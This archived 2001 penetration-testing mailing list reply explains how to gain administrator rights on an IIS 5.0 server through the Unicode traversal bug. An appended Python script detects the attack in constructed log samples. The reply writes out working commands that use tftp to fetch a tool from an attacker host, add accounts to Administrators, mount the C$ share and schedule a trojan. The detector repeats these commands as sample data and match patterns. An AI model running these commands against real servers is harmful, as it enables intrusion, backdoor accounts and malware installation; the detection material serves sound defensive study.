Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Nelson Brito <nelson () SECUNET COM BR>
Date: Mon, 26 Mar 2001 13:39:22 -0300
Renato Ettisberger wrote:
> Hi, I'm doing a pen test and I found an IIS 5.0 (Win2k) with the Unicode bug. As you know, there is a way to spawn a shell with admin rights on an IIS 4.0 with the Unicode bug.
What way? Did you use CmdAsp.ASP to do that? Is it possible?
> I ask myself whether there is a way to gain admin rights on an IIS 5.0 / Win2k with the Unicode bug too?
Yes, you can elevate IUSR_MACHINE's privilege to Administrators/Domain Admins Group. As an example:

C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\tftp.exe -i bighacker.host.com GET netddemsg.exe"
C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "netddemsg.exe \"C:\\WINNT\\system32\\net.exe localgroup Administrators IUSR_MACHINE /add\""

Then you'll have IUSR_MACHINE with Admin's privileges. So you could use the CmdAsp.ASP.

But, if you want a "lamer's technique" you could do this after the commands above:

C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe user bighacker bighacker /add"
C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe localgroup Administrators bighacker /add"
C:\BIGHacker>net use H: \\www.victim.com\C$ bighacker /u:bighacker
C:\BIGHacker>copy my_favorite_trojan.exe H:\Temp
C:\BIGHacker>at \\www.victim.com\C$ 13:37A H:\Temp\my_favorite_trojan.exe

If the Schedule Service is stopped you'll need to use the NTRK's "SC.EXE" tool (sc.exe \\www.victim.com start schedule).

PS: Of course this technique only works if the traffic to port 139 TCP is permitted.
> If I'm able to dump the password hash in crude form, how can I crack the password?
Yes, you can. If you elevate IUSR_MACHINE's privileges you should do anything you want.

PPS: Sorry for my poor English.

Regards,
--
# Nelson Brito - IBQN / Security Networks AG - The trust Company!
# "Windows NT can also be protected from nmap OS detection scans
#  thanks to *Nelson Brito* ..."
# Passage from "Hack Proofing your Network", page 93
open(S,shift) || die "Use: $0 <file>\n";
foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; }
close(S);
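From the defender's side, every step in the exchange above leaves a trace in the IIS W3C log: an encoded traversal that reaches cmd.exe, then tftp.exe pulling a tool in, then net.exe adding an account to Administrators. The script below is an added example, not code from this thread or from any of the tools it names. It scans constructed IIS 5.0-style log lines (the addresses, timestamps and field layout are made up for the example), canonicalises the request path the way a permissive UTF-8 decoder does, which is the only way to see the "/" hidden in an overlong sequence such as %c0%af, and then flags both the traversal and the follow-on commands quoted in the message. The lesson it demonstrates is the general one: canonicalise first, then check; a check on the raw or strictly decoded string misses the traversal entirely.

```python
"""Added example: flag IIS Unicode-traversal requests and the follow-on
commands from the thread above in IIS W3C log lines (constructed sample)."""
import re
from urllib.parse import unquote, unquote_to_bytes

# Constructed IIS 5.0-style W3C log lines (not a real capture):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-26 13:37:00 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-03-26 13:38:10 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp.exe+-i+10.0.0.5+GET+netddemsg.exe 200
2001-03-26 13:39:22 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+net.exe+localgroup+Administrators+IUSR_MACHINE+/add 502
2001-03-26 13:40:01 10.0.0.9 GET /default.asp - 200
2001-03-26 13:41:00 10.0.0.9 GET /images/logo.gif - 304
"""

# A ".." path segment after canonicalisation (backslashes already folded to "/").
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# Follow-on commands taken from the message: tftp pulling a tool in,
# net.exe adding a user or putting an account into Administrators.
FOLLOW_ON = [
    ("tftp-download", re.compile(rb"tftp(\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("add-to-administrators",
     re.compile(rb"net(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("add-user", re.compile(rb"net(\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.I)),
]


def lenient_utf8_decode(raw: bytes) -> str:
    """Decode UTF-8 while accepting overlong 2- and 3-byte forms.

    Python's strict decoder rejects overlong sequences, so a check on
    unquote()'s output never sees the "/" hidden in %c0%af.  The detector
    canonicalises the way a permissive decoder does before looking for
    "..": check after canonicalisation, never before.
    """
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(raw) and 0x80 <= raw[i + 1] < 0xC0:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        elif (0xE0 <= b < 0xF0 and i + 2 < len(raw)
              and all(0x80 <= x < 0xC0 for x in raw[i + 1:i + 3])):
            out.append(chr(((b & 0x0F) << 12) | ((raw[i + 1] & 0x3F) << 6)
                           | (raw[i + 2] & 0x3F)))
            i += 3
        else:
            out.append("\ufffd")     # undecodable byte, keep a placeholder
            i += 1
    return "".join(out)


def canonical_path(stem: str) -> str:
    """Percent-decode, decode leniently, fold backslashes to slashes."""
    return lenient_utf8_decode(unquote_to_bytes(stem)).replace("\\", "/")


def analyse_line(line: str):
    """Return a finding dict for a suspicious log line, else None."""
    if line.startswith("#"):          # W3C directive lines
        return None
    fields = line.split()
    if len(fields) < 6:
        return None
    _date, _time, client, _method, stem, query = fields[:6]
    findings = []
    canon = canonical_path(stem)
    if TRAVERSAL.search(canon):
        findings.append("encoded-traversal")
    if "cmd.exe" in canon.lower():
        findings.append("cmd.exe")
    # IIS writes spaces in the query as "+"; decode before matching.
    command = unquote_to_bytes(query.replace("+", " "))
    for label, pattern in FOLLOW_ON:
        if pattern.search(command):
            findings.append(label)
    if not findings:
        return None
    return {"client": client, "path": canon,
            "strict_view": unquote(stem),   # what a naive check would see
            "findings": findings}


def scan(lines):
    """Run analyse_line over an iterable of log lines; keep the hits."""
    return [hit for hit in map(analyse_line, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["client"], hit["path"], ", ".join(hit["findings"]))
```

The strict_view field is kept on each hit to show what a regex applied to Python's default unquote() output would have seen: the overlong bytes become replacement characters, the ".." segments no longer sit between slashes, and the traversal pattern does not match. Run against a real log, the "cmd.exe" and follow-on labels are the high-confidence signals; a lone "encoded-traversal" hit is worth a look but also catches scanners and broken clients.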
Current thread:
- [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- <Possible follow-ups>
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Wertheimer, Ishai (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? H D Moore (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? robmann (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)